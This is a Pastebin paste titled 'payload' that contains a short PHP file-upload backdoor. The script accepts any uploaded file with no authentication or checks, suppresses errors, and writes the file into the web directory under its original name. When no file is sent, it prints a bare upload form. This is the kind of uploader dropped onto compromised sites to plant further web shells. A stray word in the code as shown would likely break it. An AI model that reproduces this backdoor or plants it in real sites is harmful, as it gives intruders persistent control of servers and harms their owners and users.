rootasuna

payload

Oct 6th, 2019
251
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.34 KB | None | 0 0
  1. <?php
  2. ngetehasu
  3. if (isset($_FILES['azzatssins']['name'])) {
  4. $name = $_FILES['azzatssins']['name'];
  5. $azx = $_FILES['azzatssins']['tmp_name'];
  6. @move_uploaded_file($azx, $name);
  7. echo $name;
  8. } else {
  9. echo "<form method=post enctype=multipart/form-data><input type=file name=azzatssins><input type=submit value='>>'>";
  10. }
  11. ?>
Add Comment
Please, Sign In to add comment